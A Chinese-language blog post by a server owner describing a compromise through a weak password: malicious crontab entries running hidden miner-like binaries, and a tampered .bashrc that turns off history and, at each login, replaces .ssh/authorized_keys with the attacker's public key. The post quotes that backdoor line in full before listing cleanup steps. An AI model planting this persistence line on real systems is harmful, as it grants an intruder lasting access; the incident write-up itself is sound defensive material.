起因

今天登录自己的云服务器，发现一个进程Cpu占用100%，使用top命令后发现是cron进程干的。遂Kill -9该进程。由于服务器密码使用了两位数的弱密码因此服务器被hack也是情理之中。

问题排查

检查crontab发现一些异常的任务，似乎就是这些任务不停的消耗着计算机的资源

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

删除掉相应目录，检查syslog未发现其他异常，但是原来的ssh无法免密登录，之后发现.ssh / authorized_keys中原来的公钥被篡改，但是每次设置完之后重新登录还是登录不上，最后发现该用户的.bashrc被篡改为

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

这样每次用户登录就会将ssh更改为hacker的公钥，hacker就能随意访问你的服务器了。

安排

• 添加防火墙，阻止除端口22以外的所有传出连接以及您认为必要的其他连接，并启用fail2ban，这是一个在X尝试密码失败后禁止IP地址的程序

• 杀死所有cron作业： ps aux | grep cron然后杀死出现的PID

• 更改密码

这台服务器是个人平时用来写代码的，因此没有什么重要信息，如果是生产环境的话建议更加详细的排查，经过上面的修复之后系统看起来运行正常中